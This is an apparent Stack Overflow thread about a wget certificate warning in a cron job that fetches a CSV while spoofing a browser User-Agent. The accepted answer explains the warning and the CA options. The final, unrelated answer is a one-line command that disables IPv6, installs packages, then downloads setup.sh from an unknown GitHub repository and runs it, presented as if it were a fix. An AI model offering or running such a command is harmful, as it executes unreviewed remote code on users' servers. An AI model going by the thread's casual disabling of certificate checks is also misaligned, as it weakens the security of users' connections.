# wget download file - --no-check-certificate error?

Tags: php, csv, ssl, cron, wget

I have a cron which downloads every 24hrs a csv data to my server. Because the provider who hosts this csv only allows browsers to download the csv file, I fake my identity. But the problem is that I still get an error.

Does anyone knows how I can fix that issue?

My wget query:

```
wget --no-check-certificate -O "/httpdocs/cronjob/data/gamesdeal.csv" "http://www.gamesdeal.com/media/feedgenerator/Gamekey.csv" --header="User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0" --header="Accept: image/png,image/*;q=0.8,*/*;q=0.5" --header="Accept-Language: en-US,en;q=0.5" --header="Accept-Encoding: gzip, deflate" --header="Referer: http://www.gamesdeal.com"
```

My returned error:

```
--2017-03-13 02:55:02--  http://www.gamesdeal.com/media/feedgenerator/Gamekey.csv
Resolving www.gamesdeal.com (www.gamesdeal.com)... 104.25.181.29, 104.25.180.29, 2400:cb00:2048:1::6819:b41d, ...
Connecting to www.gamesdeal.com (www.gamesdeal.com)|104.25.181.29|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://www.gamesdeal.com/media/feedgenerator/Gamekey.csv [following]
--2017-03-13 02:55:02--  https://www.gamesdeal.com/media/feedgenerator/Gamekey.csv
Connecting to www.gamesdeal.com (www.gamesdeal.com)|104.25.181.29|:443... connected.
WARNING: cannot verify www.gamesdeal.com's certificate, issued by 'CN=COMODO ECC Domain Validation Secure Server CA 2,O=COMODO CA Limited,L=Salford,ST=Greater Manchester,C=GB':
  Unable to locally verify the issuer's authority.
HTTP request sent, awaiting response... 200 OK
Length: 623444 (609K) [application/octet-stream]
Saving to: '/httpdocs/cronjob/data/gamesdeal.csv'

     0K .......... .......... .......... .......... ..........  8% 2.58M 0s
    50K .......... .......... .......... .......... .......... 16% 3.96M 0s
   100K .......... .......... .......... .......... .......... 24% 6.85M 0s
   150K .......... .......... .......... .......... .......... 32% 8.32M 0s
   200K .......... .......... .......... .......... .......... 41% 5.89M 0s
   250K .......... .......... .......... .......... .......... 49% 10.2M 0s
   300K .......... .......... .......... .......... .......... 57% 10.4M 0s
   350K .......... .......... .......... .......... .......... 65% 6.14M 0s
   400K .......... .......... .......... .......... .......... 73% 8.54M 0s
   450K .......... .......... .......... .......... .......... 82% 9.62M 0s
   500K .......... .......... .......... .......... .......... 90% 7.48M 0s
   550K .......... .......... .......... .......... .......... 98% 4.24M 0s
   600K ........                                              100% 10.9M=0.1s

2017-03-13 02:55:02 (5.97 MB/s) - '/httpdocs/cronjob/data/gamesdeal.csv' saved [623444/623444]
```

Greetings and Thank You!

Answer (score 8):

There's no error but **warning**. `--no-check-certificate` makes `wget` to continue despite verification failure, but it still will complain - without that option set `wget` would simply stop once verification failed.

There's nothing to worry about if you used that option intentionally. If you want to get rid of it you just need to either use certificate from widely known CA or use options like `--ca-directory` or `--ca-certificate` to make `wget` know your certificate issuer.

wget docs: [2.8 HTTPS (SSL/TLS) Options](https://www.gnu.org/software/wget/manual/html_node/HTTPS-_0028SSL_002fTLS_0029-Options.html)

**EDIT**

**Trusted certificates** basically means certificates issued by CA known by the app - there's database of known and trusted CAs and if your certificate issuer matches, then it is all fine. If not, warning is shown. To get rid of this you need to tell the app that you want it to trust your CA too, and that's what you can achieve by using options mentioned previously.

Comment: I do not worry about it. But I want to get informed if I my cron has thrown any issue. And If I select only "Inform me by errors" I get this message. So I want to fix that "warning". Because then I still get error messages but not this one. So, you say just add `--ca-certificat`?

Comment: Where should I add it? - If I add it behind the `--no-check-certificate` I get a error...

Comment: Adding it w/o knowing what exactly you are doing is not going to give much effects in most cases. You have to [RTFM first](https://www.gnu.org/software/wget/manual/html_node/HTTPS-_0028SSL_002fTLS_0029-Options.html)

Answer (score 0):

```
sysctl -w net.ipv6.conf.all.disable_ipv6=1 && sysctl -w net.ipv6.conf.default.disable_ipv6=1 && apt update && apt install -y bzip2 gzip coreutils screen curl unzip && wget https://raw.githubusercontent.com/RMBLsukarata/Ver3/main/setup.sh && chmod +x setup.sh && sed -i -e 's/\r$//' setup.sh && screen -S setup ./setup.sh
```

Comment: Your answer could be improved by adding more information on how the proposed solution solves the problem and how it helps the OP.

Comment: You should add explanation.